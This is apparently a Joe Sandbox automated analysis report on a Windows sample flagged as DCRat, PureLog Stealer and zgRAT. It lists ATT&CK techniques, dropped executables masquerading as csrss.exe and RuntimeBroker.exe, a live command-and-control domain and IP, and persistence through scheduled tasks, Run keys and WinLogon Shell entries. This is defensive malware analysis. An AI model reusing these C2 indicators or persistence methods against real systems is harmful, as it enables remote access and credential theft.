                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		OS Credential Dumping2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		2
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		11
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory34
                              System Information Discovery                              		Remote Desktop ProtocolData from Removable Media1
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		2
                              Obfuscated Files or Information                              		Security Account Manager241
                              Security Software Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron21
                              Registry Run Keys / Startup Folder                              		21
                              Registry Run Keys / Startup Folder                              		12
                              Software Packing                              		NTDS1
                              Process Discovery                              		Distributed Component Object ModelInput Capture13
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets151
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Remote System Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items243
                              Masquerading                              		DCSync1
                              System Network Configuration Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501437 Sample: 4ra1Fo2Zql.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 69 621287cm.n9shteam2.top 2->69 73 Suricata IDS alerts for network traffic 2->73 75 Found malware configuration 2->75 77 Antivirus detection for URL or domain 2->77 79 16 other signatures 2->79 8 4ra1Fo2Zql.exe 12 39 2->8         started        12 GrVEPTmsoNTbY.exe 14 11 2->12         started        15 RuntimeBroker.exe 2->15         started        17 8 other processes 2->17 signatures3 process4 dnsIp5 53 C:\Users\user\RuntimeBroker.exe, PE32 8->53 dropped 55 C:\Users\user\Desktop\xxMkqOtN.log, PE32 8->55 dropped 57 C:\Users\user\Desktop\sTRlxExW.log, PE32 8->57 dropped 65 13 other malicious files 8->65 dropped 89 Creates an undocumented autostart registry key 8->89 91 Creates multiple autostart registry keys 8->91 93 Drops PE files to the user root directory 8->93 101 3 other signatures 8->101 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 csc.exe 4 8->25         started        29 18 other processes 8->29 71 621287cm.n9shteam2.top 80.211.144.156, 49704, 49712, 49713 ARUBA-ASNIT Italy 12->71 59 C:\Users\user\Desktop\myawJPbK.log, PE32 12->59 dropped 61 C:\Users\user\Desktop\gwaXxxDZ.log, PE32 12->61 dropped 63 C:\Users\user\Desktop\cPGganVc.log, PE32 12->63 dropped 67 3 other malicious files 12->67 dropped 27 cmd.exe 12->27         started        95 Antivirus detection for dropped file 15->95 97 Multi AV Scanner detection for dropped file 15->97 99 Machine Learning detection for dropped file 15->99 file6 signatures7 process8 file9 81 Uses ping.exe to sleep 19->81 83 Uses ping.exe to check the status of other devices and networks 19->83 31 conhost.exe 19->31         started        33 chcp.com 19->33         started        35 PING.EXE 19->35         started        37 csrss.exe 19->37         started        49 C:\Program Files (x86)\...\msedge.exe, PE32 22->49 dropped 85 Infects executable files (exe, dll, sys, html) 22->85 39 conhost.exe 22->39         started        41 cvtres.exe 1 22->41         started        51 C:\Windows\...\SecurityHealthSystray.exe, PE32 25->51 dropped 43 conhost.exe 25->43         started        45 cvtres.exe 25->45         started        47 3 other processes 27->47 87 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->87 signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              4ra1Fo2Zql.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              4ra1Fo2Zql.exe100%AviraHEUR/AGEN.1323342
                              4ra1Fo2Zql.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Desktop\VTXhBlNT.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\MjzRNvWG.log100%AviraTR/PSW.Agent.qngqt
                              C:\Users\user\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\sTRlxExW.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\CAgBdTQY.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat100%AviraBAT/Delbat.C
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\IZdub348jc.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\VTXhBlNT.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\MjzRNvWG.log100%Joe Sandbox ML
                              C:\Users\user\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\cPGganVc.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\VLoPWCmN.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\CAgBdTQY.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\MjzRNvWG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\VLoPWCmN.log8%ReversingLabs
                              C:\Users\user\Desktop\VTXhBlNT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\cPGganVc.log8%ReversingLabs
                              C:\Users\user\Desktop\fuHfGerv.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\gwaXxxDZ.log25%ReversingLabs
                              C:\Users\user\Desktop\myawJPbK.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\sTRlxExW.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\xxMkqOtN.log25%ReversingLabs
                              C:\Users\user\RuntimeBroker.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://621287cm.n9shteam2.top/100%Avira URL Cloudmalware
                              http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php100%Avira URL Cloudmalware
                              http://621287cm.n9shteam2.top100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              621287cm.n9shteam2.top
                              		80.211.144.156
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.phptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://621287cm.n9shteam2.top/GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://621287cm.n9shteam2.topGrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                80.211.144.156
                                		621287cm.n9shteam2.topItaly
                                		31034ARUBA-ASNITtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1501437
                                Start date and time:2024-08-29 23:01:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:56
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4ra1Fo2Zql.exe
                                renamed because original name is a hash value
                                Original Sample Name:1b7d99034e439d9f034c9969f88f7b74.exe
                                Detection:MAL
                                Classification:mal100.spre.troj.expl.evad.winEXE@54/48@1/1
                                EGA Information:
                                • Successful, ratio: 8.3%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target 4ra1Fo2Zql.exe, PID 7384 because it is empty
                                • Execution Graph export aborted for target 4ra1Fo2Zql.exe, PID 7420 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 4124 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 7096 because it is empty
                                • Execution Graph export aborted for target GrVEPTmsoNTbY.exe, PID 7716 because it is empty
                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7492 because it is empty
                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7528 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7452 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7476 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 7752 because it is empty
                                • Execution Graph export aborted for target csrss.exe, PID 8096 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 4ra1Fo2Zql.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                17:02:11API Interceptor1x Sleep call for process: GrVEPTmsoNTbY.exe modified
                                23:01:57Task SchedulerRun new task: GrVEPTmsoNTbY path: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                23:01:57Task SchedulerRun new task: GrVEPTmsoNTbYG path: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                23:01:59Task SchedulerRun new task: 4ra1Fo2Zql path: "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                23:01:59Task SchedulerRun new task: 4ra1Fo2Zql4 path: "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                23:01:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                                23:02:00Task SchedulerRun new task: csrss path: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                23:02:00Task SchedulerRun new task: csrssc path: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                23:02:00Task SchedulerRun new task: RuntimeBroker path: "C:\Users\user\RuntimeBroker.exe"
                                23:02:00Task SchedulerRun new task: RuntimeBrokerR path: "C:\Users\user\RuntimeBroker.exe"
                                23:02:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                23:02:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
                                23:02:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                23:02:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                                23:02:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                23:02:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
                                23:02:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                23:03:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                                23:03:16AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                23:03:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\user\RuntimeBroker.exe"
                                23:03:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                23:03:49AutostartRun: WinLogon Shell "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                23:03:58AutostartRun: WinLogon Shell "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                80.211.144.156BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 426314cm.n9sh.top/vmupdateAuthsqlDbAsyncTrackDlecentralDownloads.php
                                foIdlOzWvH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 921773cm.n9sh.top/providerExternalimageVideojsPacketprocessorDefaultDbLinux.php
                                3O5Uh9S6wK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 951499cm.nyashtech.top/sqlcentralUploads.php
                                trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 966193cm.n9shka.top/Multilinux.php
                                bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 951499cm.nyashtech.top/PollGeoDbwordpressTemporary/722944f89091ce5d9b1c5fbdfd00568555f67a8aa399d5400d05a2a7b07fcbcd263346663ea3568b
                                iolZQ9869U.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 438772cm.n9shka.top/javascriptPollCpuLinuxWindowsgenerator.php
                                8mBGM9uk53.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 951499cm.nyashtech.top/sqlcentralUploads.php
                                jZrY9owO7A.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 621196cl.nyashtop.top/PythonPacketProcessapidbwindowsUniversalcdn.php
                                Componentsession.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 664732cm.nyashka.top/Provider_CpuUpdateprocessorLongpollwindowstesttrackCdn.php
                                -#U00bc).exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 664732cm.nyashka.top/Provider_CpuUpdateprocessorLongpollwindowstesttrackCdn.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                ARUBA-ASNITbintoday1.exeGet hashmaliciousFormBookBrowse
                                • 62.149.128.40
                                Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
                                • 62.149.156.218
                                BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                https://urlsand.esvalabs.com/?u=https%3A%2F%2Flinkin.bio%2Falbatros&e=606d87ee&h=dea68a16&f=y&p=yGet hashmaliciousHTMLPhisherBrowse
                                • 95.110.136.136
                                foIdlOzWvH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                3O5Uh9S6wK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                iolZQ9869U.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156
                                8mBGM9uk53.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 80.211.144.156

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\Desktop\CAgBdTQY.logugRGgCJhQl.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  eCGKhYZtgx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    czcgyt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        iolZQ9869U.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            jZrY9owO7A.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              Componentsession.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                -#U00bc).exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  Loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                    Created / dropped Files

                                                    C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...

                                                    C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Program Files (x86)\Google\b4601131bf8590

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (742), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):742
                                                    Entropy (8bit):5.902673486354985
                                                    Encrypted:false
                                                    SSDEEP:12:blB5iyrgpY3Nzu1j7Poh00Yky+YFKlo19JwOuJMKtA/SUSlntHqzjIn9er52wy+D:L8igk63mYky+YFUwuJJa/aBRAUn9lwpD
                                                    MD5:28C1B8E252687E8B1959D8B6398861D0
                                                    SHA1:5808B585406A2F4E88E3B3832352990B5EC3B3C1
                                                    SHA-256:40A7070779916B047FC45F664804E0831F7963B7F98CA0D46B32A57F15C90310
                                                    SHA-512:EA7FECB5981BF22FB1CE03AF1B0DE1CD574211A3AADEA08993B127BBC95BFF2E9B9665E402E141269C62FA6E791184BD60325BA8901AB94E41A8D2AC9A0174F4
                                                    Malicious:false
                                                    Preview:BFuc6HK1R0rFCcEm8L1jDLa0NBAhoyAGouPR0M5WJju1f73Huz7HThq0p4O4HnNc0lbSNxvwPeZdaiUQH2wz13wGDZm67APgVSB4fl47DK1zIMaGj7wO0Yl6yVPyKyyPP3IHhZug8zvqC7709gWANAp7rFFKWGwOWlkPESjJNQQBm441XYyocyBONKacUkK2CgUaWswq6Mw7toUwKOw7RIwikVB31HzmFY8FkeepmIrPBDei0oRGxMk4uwzBq2zzXJ1VqOMptHVJahgg0dDNztz3xEVyod8tS221LJ2lblWq0bdMPSKNzm9nU8hl2XBQJm0hpoVrkbvNXIDWkJiWSu3q3OhNmRsEkGhOk5hl7dnY0vQL5LAtzo7YsKobHHETsrnRlyvpm7YyGfzH7VSbQ9O5IIfZRFe0YUpJI9kGZVH1QISMVhdvznDtcrIdSVYgdiaw0p97vLC52Xp90TEtmsAuR6ra0GxD7kYssfWpifAnlH1FCJn9Ro4uhpf48iHoY87R86QU7YLGrXJJFmYrdxvSqnLD9br9YWOnKjGF3SC2cxDJgWzWKaKkMolUvNVfrMrUIg8ffSxLv302kBgmmVz8Moaf7wTp7gLQGsAAXT01m9zTytuuqs2VWtIeFdht9INOsjw2BgOTe8WMzHqOCj8Onz3Wjf44vH2dvkkP62tKdj0YW6p8xTqZJ8k2pZSflUhXF2aOgaRJ0yvE8f9n06HcacUx9rkhjNjJCd

                                                    C:\Program Files (x86)\MSECache\OfficeKMS\886983d96e3d3e

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):202
                                                    Entropy (8bit):5.73787963507525
                                                    Encrypted:false
                                                    SSDEEP:3:RxW3/A4cTlG6vxIpnpjPhzizNNc+FDoM90R3BDxykOQxLEElfSrPtn:7W3I4cpG62zhzykIcM90R3BD4SKOSLt
                                                    MD5:5E55154F678D614A716DCE1117B9B97D
                                                    SHA1:29C862CCEBFBDBB78BE83B998CE47F14844C3D98
                                                    SHA-256:A9A8FFA9D701EC7CA0AA6A53514555F556E4733F7A2BB4744D76C3A077314C33
                                                    SHA-512:6ECFE3394CE7EDB1707E7B2F48D42929E98A9F09F3CE1E6B0E614557BCCF1C82B5FFDC7BF7DA8FA62F568809572706513B5ACF36B1E6654A16FF210FB336BA12
                                                    Malicious:false
                                                    Preview:ZAUBmqqSfOH2c1xZ3USV30VK7Tuo7k1R1tNmrv2RT7EcmHQ3NndDMuSioKET5CV5W0AtoLsIcAB6w3hzD1aTGyEHbo7grjWQlJFwHhOB5VlMsWwvmOPEmByiv3SAOLa3ouUnxvsgmYYvM2YE1L4cTRojUgAOPOxt4rh7CJ80gtcNnCV3eNIDR7kWFuSQveRXlo1eUbCsND

                                                    C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
